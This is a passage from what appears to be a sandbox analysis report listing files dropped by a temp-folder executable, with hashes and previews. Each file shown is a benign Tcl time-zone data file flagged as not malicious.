                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):111
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.92687099262498
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDIbSXGm2OHkVsRYvC:SlSWB9X5yRUtm2OHkSQC
                                                                                                                                                                                                                                                                                                                                MD5:C157F79ADE92A69E46472EA921E1370F
                                                                                                                                                                                                                                                                                                                                SHA1:4B9E5AFA769D5BDF3FDF05BC24A6A632C6D86ECB
                                                                                                                                                                                                                                                                                                                                SHA-256:0606FBAB9374A74D4B2ED17DD04D9DCED7131768CCF673C5C3B739727743383F
                                                                                                                                                                                                                                                                                                                                SHA-512:B6814282465ABF4DF31341306050F11ECAAFC5915C420A8E7F8D787E66308C58FF7C348D6CBDB4064C346800564000C7C763BDD01CB8CE3A8A81550F65C9A74C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-4) {. {-9223372036854775808 14400 0 +04}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):111
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.91086034871979
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDI7wkXGm2OHM0VQL:SlSWB9X5yRU7Em2OHnVQL
                                                                                                                                                                                                                                                                                                                                MD5:AF742680C5A3BA5981DD7F0646EF6CCA
                                                                                                                                                                                                                                                                                                                                SHA1:0753749D4636D561A8942BB1641BDBCC42349A9B
                                                                                                                                                                                                                                                                                                                                SHA-256:5E2D90AF8A161D47F30E1C4A0F5E1CAB5E9F24201557864A02D3009B1ECFEDE0
                                                                                                                                                                                                                                                                                                                                SHA-512:9B738675FC02613929BF90A7C78DD632AB782D20B5E660578AB590858D22BCD79E5AFB191D41E9DF94E2E586B5D2A163AB7D8364A02A5DE60E5B838F8B85D2FD
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-5) {. {-9223372036854775808 18000 0 +05}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):111
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.930155028450208
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDIgwcXGm2OHETNSTL:SlSWB9X5yRUgwTm2OHETMn
                                                                                                                                                                                                                                                                                                                                MD5:298F4671F470C4628B3174D5D1D0608D
                                                                                                                                                                                                                                                                                                                                SHA1:5626202FB7186B4555C03F94CEE38AD0FAB81F40
                                                                                                                                                                                                                                                                                                                                SHA-256:19760989015244E4F39AC12C07E6665038AE08282DAF8D6DB0BB5E2F642C922D
                                                                                                                                                                                                                                                                                                                                SHA-512:F81B901249D3FAED3805471F256F55463A7A2FC8CB612FF95E698D63F9609D5D1B3B57DD87021C5DD809D971709EC3831351D54E971E25643B67161E9EAD5E25
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-6) {. {-9223372036854775808 21600 0 +06}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):111
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.883134479361256
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDIu/kXGm2OHAXUVSYvC:SlSWB9X5yRUuTm2OHAXUVSYvC
                                                                                                                                                                                                                                                                                                                                MD5:2317D02708980D7F17B1A4BDE971D15F
                                                                                                                                                                                                                                                                                                                                SHA1:2E78CDE3608F6B03DEB534D14D069D3D89DE85EF
                                                                                                                                                                                                                                                                                                                                SHA-256:0BF01EEEBAA49CE9859C2A5835C6A826B158A7BC3B14C473FBB0167ABA9EA4B9
                                                                                                                                                                                                                                                                                                                                SHA-512:21083EAEACD689FD07D458DB82BC2559445A1C558EB8BAF098B71CFD3A599BB756336F847CBE536648AF473E22E0000B2A8C44A45D0866994F03A78D4E841FC5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-7) {. {-9223372036854775808 25200 0 +07}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):111
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.8680235243759755
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDIlEXGm2OHN/VsdYK:SlSWB9X5yRUlLm2OHUJ
                                                                                                                                                                                                                                                                                                                                MD5:B940D187558341DBF4D619248C13C7CA
                                                                                                                                                                                                                                                                                                                                SHA1:0C6B11AA9DBC0A395345F79B4B7325FBE870A414
                                                                                                                                                                                                                                                                                                                                SHA-256:DAB4C0E14D2850BF917C5891E864834CA4BFD38D5470F119F529582976551862
                                                                                                                                                                                                                                                                                                                                SHA-512:042176822D8BFD72FFC0727176596430B656E4986636E9869F883B7078389F936EFA8CCFA9BA7ED0963899BD7D134DB9CD25F24C42040781CC37F2701D0CA28A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-8) {. {-9223372036854775808 28800 0 +08}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):111
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.91213701043219
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRDIedSXGm2OHENScCC:SlSWB9X5yRUwJm2OHsScCC
                                                                                                                                                                                                                                                                                                                                MD5:DD58339761ECF5503A48267CFD8E3837
                                                                                                                                                                                                                                                                                                                                SHA1:B58511A80448D74B38365EA537BBE0D21956F0E2
                                                                                                                                                                                                                                                                                                                                SHA-256:383EFE43E20963058BFCD852813BDA3FCCC0B4A7AC26317E621589B4C97C1B90
                                                                                                                                                                                                                                                                                                                                SHA-512:C865244051882FD141D369435CFEED0A1E1D254C0313C1EFE55F5AF72412BE11F2B76484170B94BC4E9FCC0D2EEC373D523732FF7945999717D5827FCE68F54F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT-9) {. {-9223372036854775808 32400 0 +09}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):153
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.836974611939794
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqSsM4DvFVAIgexvqtyRDVMFHp8RDMvn:SlSWB9IZaM3yF4FVAIgJtyRC1p8RQvn
                                                                                                                                                                                                                                                                                                                                MD5:BE8C5C3B3DACB97FADEB5444976AF56A
                                                                                                                                                                                                                                                                                                                                SHA1:A0464B66E70A1AF7963D2BE7BC1D88E5842EC99A
                                                                                                                                                                                                                                                                                                                                SHA-256:89F4624DC69DE64B7AF9339FE17136A88A0C28F5F300575540F8953B4A621451
                                                                                                                                                                                                                                                                                                                                SHA-512:A0E11D9DF5AD2C14A012E82F24298921780E091EEDD680535658F9CD1337A4103BA0676DF9B58865DD7D2CFA96AEED7BF786B88786FAF31B06713D61B4C0308A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/GMT)]} {. LoadTimeZoneFile Etc/GMT.}.set TZData(:Etc/GMT0) $TZData(:Etc/GMT).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):158
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.862741414606617
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqSsM4DvFVAIgexvqtyRp+FB5yRDMvn:SlSWB9IZaM3yF4FVAIgJtyRp6BURQvn
                                                                                                                                                                                                                                                                                                                                MD5:2DADDAD47A64889162132E8DA0FFF54F
                                                                                                                                                                                                                                                                                                                                SHA1:EC213743939D699A4EE4846E582B236F8C18CB29
                                                                                                                                                                                                                                                                                                                                SHA-256:937970A93C2EB2D73684B644E671ACA5698BCB228810CC9CF15058D555347F43
                                                                                                                                                                                                                                                                                                                                SHA-512:CA8C45BA5C1AF2F9C33D6E35913CED14B43A7AA37300928F14DEF8CB5E7D56B58968B9EE219A0ACCB4C17C52F0FBD80BD1018EF5426C137628429C7DAA41ACA2
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/GMT)]} {. LoadTimeZoneFile Etc/GMT.}.set TZData(:Etc/Greenwich) $TZData(:Etc/GMT).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):105
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.857741203314798
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yR5FkXGm2OHv1CCn:SlSWB9X5yRHm2OHNLn
                                                                                                                                                                                                                                                                                                                                MD5:415F102602AFB6F9E9F2B58849A32CC9
                                                                                                                                                                                                                                                                                                                                SHA1:002C7D99EBAA57E8599090CFBF39B8BEAABE4635
                                                                                                                                                                                                                                                                                                                                SHA-256:549D4CC4336D35143A55A09C96FB9A36227F812CA070B2468BD3BB6BB4F1E58F
                                                                                                                                                                                                                                                                                                                                SHA-512:6CA28E71F941D714F3AACA619D0F4FEEF5C35514E05953807C225DF976648F257D835B59A03991D009F738C6FD94EB50B4ECA45A011E63AFDCA537FBAC2B6D1B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/UCT) {. {-9223372036854775808 0 0 UCT}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):105
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.857741203314798
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5yRF3dFkXGm2OHvr:SlSWB9X5yR9dJm2OHj
                                                                                                                                                                                                                                                                                                                                MD5:6343442DDDC19AF39CADD82AC1DDA9BD
                                                                                                                                                                                                                                                                                                                                SHA1:9D20B726C012F14D99E701A69C60F81CB33E9DA6
                                                                                                                                                                                                                                                                                                                                SHA-256:48B88EED5EF95011F41F5CA7DF48B6C71BED711B079E1132B2C1CD538947EF64
                                                                                                                                                                                                                                                                                                                                SHA-512:4CFED8C80D9BC2A75D4659A14F22A507CF55D3DCC88318025BCB8C99AE7909CAF1F11B1ADC363EF007520BF09473CB68357644E41A9BBDAF9DB0B0A44ECC4FBF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/UTC) {. {-9223372036854775808 0 0 UTC}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):158
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.825049978035721
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqAxmSwFVAIgESRLyRYzXDJMFfh8RFu:SlSWB9IZaM3yzUFVAIgBLyRY7VMr8RI
                                                                                                                                                                                                                                                                                                                                MD5:7BE0766999E671DDD5033A61A8D84683
                                                                                                                                                                                                                                                                                                                                SHA1:D2D3101E78919EB5FE324FFC85503A25CFD725E0
                                                                                                                                                                                                                                                                                                                                SHA-256:90B776CF712B8FE4EEC587410C69A0EC27417E79006132A20288A9E3AC5BE896
                                                                                                                                                                                                                                                                                                                                SHA-512:A4CA58CD4DC09393BBE3C43D0B5E851DEBEEDC0C5CEC7DCED4D24C14796FD336D5607B33296985BD14E7660DCE5C85C0FB625B2F1AD9AC10F1631A76ECEB04B8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/UTC)]} {. LoadTimeZoneFile Etc/UTC.}.set TZData(:Etc/Universal) $TZData(:Etc/UTC).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):153
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.824450775594084
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqAxmSwFVAIgESRLyRaQEBURFu:SlSWB9IZaM3yzUFVAIgBLyRYaRI
                                                                                                                                                                                                                                                                                                                                MD5:64ED445C4272D11C85BD2CFC695F180F
                                                                                                                                                                                                                                                                                                                                SHA1:EDE76B52D3EEBCC75C50E17C053009A453D60D42
                                                                                                                                                                                                                                                                                                                                SHA-256:A68D32DA2214B81D1C0C318A5C77975DE7C4E184CB4D60F07858920B11D065FE
                                                                                                                                                                                                                                                                                                                                SHA-512:4CE8FC2B7C389BD2058CE77CD7234D4EA3F81F40204C9190BF0FB6AA693FB40D0638BFB0EB0D9FA20CB88804B73F6EE8202439C1F553B1293C6D2E5964216A1D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/UTC)]} {. LoadTimeZoneFile Etc/UTC.}.set TZData(:Etc/Zulu) $TZData(:Etc/UTC).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8792
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8152682180965747
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:nK5UUH6mek6EvDGwdSscRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVab:K5VfSTRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                                                                                                MD5:C107BB0AC411789418982B201FF1F857
                                                                                                                                                                                                                                                                                                                                SHA1:71691B3E9FCC3503943BAFD872A881C1F1EE8451
                                                                                                                                                                                                                                                                                                                                SHA-256:2794B605AE149FFB58D88508A663BB54034FD542BF14B56DAE62801971612F5B
                                                                                                                                                                                                                                                                                                                                SHA-512:BFC79B3245526ED54615F613D3158DC4CF44DAF3DB758DBA65977EC91263CEFFA628D36E7CA536E140AF727EC321D9047C36D56303718D1EC5B49F5A8BCAE2E9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Amsterdam) {. {-9223372036854775808 1172 0 LMT}. {-4260212372 1172 0 AMT}. {-1693700372 4772 1 NST}. {-1680484772 1172 0 AMT}. {-1663453172 4772 1 NST}. {-1650147572 1172 0 AMT}. {-1633213172 4772 1 NST}. {-1617488372 1172 0 AMT}. {-1601158772 4772 1 NST}. {-1586038772 1172 0 AMT}. {-1569709172 4772 1 NST}. {-1554589172 1172 0 AMT}. {-1538259572 4772 1 NST}. {-1523139572 1172 0 AMT}. {-1507501172 4772 1 NST}. {-1490566772 1172 0 AMT}. {-1470176372 4772 1 NST}. {-1459117172 1172 0 AMT}. {-1443997172 4772 1 NST}. {-1427667572 1172 0 AMT}. {-1406672372 4772 1 NST}. {-1396217972 1172 0 AMT}. {-1376950772 4772 1 NST}. {-1364768372 1172 0 AMT}. {-1345414772 4772 1 NST}. {-1333318772 1172 0 AMT}. {-1313792372 4772 1 NST}. {-1301264372 1172 0 AMT}. {-1282256372 4772 1 NST}. {-1269814772 1172 0 AMT}. {-1250720372 4772 1 NST}. {-123836517
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):6690
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.730744509734253
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:u7rRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQltUbAyzF76:uXRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                                                                                                MD5:13F10BC59FB9DBA47750CA0B3BFA25E9
                                                                                                                                                                                                                                                                                                                                SHA1:992E50F4111D55FEBE3CF8600F0B714E22DD2B16
                                                                                                                                                                                                                                                                                                                                SHA-256:E4F684F28AD24B60E21707820C40A99E83431A312D26E6093A198CB344C249DC
                                                                                                                                                                                                                                                                                                                                SHA-512:DA5255BDE684BE2C306C6782A61DE38BFCF9CFF5FD117EBDE5EF364A5ED76B5AB88E6F7E08337EEB2CEC9CB03238D9592941BDAA01DFB061F21085D386451AFA
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Andorra) {. {-9223372036854775808 364 0 LMT}. {-2177453164 0 0 WET}. {-733881600 3600 0 CET}. {481078800 7200 0 CEST}. {496803600 3600 0 CET}. {512528400 7200 1 CEST}. {528253200 3600 0 CET}. {543978000 7200 1 CEST}. {559702800 3600 0 CET}. {575427600 7200 1 CEST}. {591152400 3600 0 CET}. {606877200 7200 1 CEST}. {622602000 3600 0 CET}. {638326800 7200 1 CEST}. {654656400 3600 0 CET}. {670381200 7200 1 CEST}. {686106000 3600 0 CET}. {701830800 7200 1 CEST}. {717555600 3600 0 CET}. {733280400 7200 1 CEST}. {749005200 3600 0 CET}. {764730000 7200 1 CEST}. {780454800 3600 0 CET}. {796179600 7200 1 CEST}. {811904400 3600 0 CET}. {828234000 7200 1 CEST}. {846378000 3600 0 CET}. {859683600 7200 1 CEST}. {877827600 3600 0 CET}. {891133200 7200 1 CEST}. {909277200 3600 0 CET}. {922582800 7200 1 CEST}. {941331600 3600 0 CET}. {9540
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1992
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5867428099003957
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:ce0exLWtjS+OVkb/cXODnOwUDOS5u8OimFeb/ROHc9qOYNkw/O2blbEUhtCUH9mt:iDTZVemFLN7NBx333+ix6b0JiGef
                                                                                                                                                                                                                                                                                                                                MD5:103F48F9DDAC5D94F2BECDA949DE5E50
                                                                                                                                                                                                                                                                                                                                SHA1:0582454439DD4E8D69E7E8EE9B8A3F041F062E89
                                                                                                                                                                                                                                                                                                                                SHA-256:823A0A0DBA01D9B34794EB276F9ABB9D2EC1E60660B20EAA2BA097884E3934F2
                                                                                                                                                                                                                                                                                                                                SHA-512:7419A8F5CF49BE76D7CD7D070FF4467CED851EC76E38A07BD590ED64B96DA446968195096DE2F8298C448778E0A40CAE717C8F234CCDBDF5C3C21B7D056EA4C1
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Astrakhan) {. {-9223372036854775808 11532 0 LMT}. {-1441249932 10800 0 +03}. {-1247540400 14400 0 +05}. {354916800 18000 1 +05}. {370724400 14400 0 +04}. {386452800 18000 1 +05}. {402260400 14400 0 +04}. {417988800 18000 1 +05}. {433796400 14400 0 +04}. {449611200 18000 1 +05}. {465343200 14400 0 +04}. {481068000 18000 1 +05}. {496792800 14400 0 +04}. {512517600 18000 1 +05}. {528242400 14400 0 +04}. {543967200 18000 1 +05}. {559692000 14400 0 +04}. {575416800 18000 1 +05}. {591141600 14400 0 +04}. {606866400 10800 0 +04}. {606870000 14400 1 +04}. {622594800 10800 0 +03}. {638319600 14400 1 +04}. {654649200 10800 0 +03}. {670374000 14400 0 +04}. {701820000 10800 0 +04}. {701823600 14400 1 +04}. {717548400 10800 0 +03}. {733273200 14400 1 +04}. {748998000 10800 0 +03}. {764722800 14400 1 +04}. {780447600 10800 0 +03}. {7961724
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7686
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.635151038354021
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:JAK3+9wAuy+Hk+PVqVaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2l:JAKOK1XPzh2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                                                                                                MD5:D64695F05822EF0DF9E3762A1BC440A0
                                                                                                                                                                                                                                                                                                                                SHA1:F17F03CFD908753E28F2C67D2C8649B8E24C35F7
                                                                                                                                                                                                                                                                                                                                SHA-256:118289C1754C06024B36AE81FEE96603D182CB3B8D0FE0A7FD16AD34DB81374D
                                                                                                                                                                                                                                                                                                                                SHA-512:3C5BDE2004D6499B46D9BAB8DBFDCC1FC2A729EEA4635D8C6CB4279AEE9B5655CE93D2E3F09B3E7295468007FFB5BE6FEC5429501E8FB4D3C2BCC05177C2158A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Athens) {. {-9223372036854775808 5692 0 LMT}. {-2344642492 5692 0 AMT}. {-1686101632 7200 0 EET}. {-1182996000 10800 1 EEST}. {-1178161200 7200 0 EET}. {-906861600 10800 1 EEST}. {-904878000 7200 0 CEST}. {-857257200 3600 0 CET}. {-844477200 7200 1 CEST}. {-828237600 3600 0 CET}. {-812422800 7200 0 EET}. {-552362400 10800 1 EEST}. {-541652400 7200 0 EET}. {166485600 10800 1 EEST}. {186184800 7200 0 EET}. {198028800 10800 1 EEST}. {213753600 7200 0 EET}. {228873600 10800 1 EEST}. {244080000 7200 0 EET}. {260323200 10800 1 EEST}. {275446800 7200 0 EET}. {291798000 10800 1 EEST}. {307407600 7200 0 EET}. {323388000 10800 1 EEST}. {338936400 7200 0 EET}. {347148000 7200 0 EET}. {354675600 10800 1 EEST}. {370400400 7200 0 EET}. {386125200 10800 1 EEST}. {401850000 7200 0 EET}. {417574800 10800 1 EEST}. {433299600 7200 0 EET}. {4490
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):177
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.827362756219521
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVxKL82wFVAIgoqyKL8p6yQahs3QavKL8i:SlSWB9IZaM3ymvKA2wFVAIgovKAUy70U
                                                                                                                                                                                                                                                                                                                                MD5:19134F27463DEDF7E25BC72E031B856F
                                                                                                                                                                                                                                                                                                                                SHA1:40D9E60D26C592ED79747D1253A9094FCDE5FD33
                                                                                                                                                                                                                                                                                                                                SHA-256:5D31D69F259B5B2DFE016EB1B2B811BD51A1ED93011CBB34D2CF65E4806EB819
                                                                                                                                                                                                                                                                                                                                SHA-512:B80202194A9D547AEC3B845D267736D831FB7E720E171265AC3F0074C8B511518952BF686A235E6DDEFC11752C3BD8A48A184930879B68980AC60E9FAECBFB44
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/London)]} {. LoadTimeZoneFile Europe/London.}.set TZData(:Europe/Belfast) $TZData(:Europe/London).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7059
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.733102701717456
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:TX6TRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQltUbAyzF76:TWRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                                                                                                MD5:841E21EED6229503BF41A858601453B0
                                                                                                                                                                                                                                                                                                                                SHA1:6F5632B23F2C710106211FBCD2C17DC40B026BFB
                                                                                                                                                                                                                                                                                                                                SHA-256:813B4B4F13401D4F92B0F08FC1540936CCFF91EFD8B8D1A2C5429B23715C2748
                                                                                                                                                                                                                                                                                                                                SHA-512:85863B12F17A4F7FAC14DF4D3AB50CE33C7232A519F7F10CC521AC0F695CD645857BD0807F0A9B45C169DD7C1240E026C567B35D1D157EE3DB3C80A57063E8FE
                                                                                                                                                                                                                                                                                                                                Malicious:false
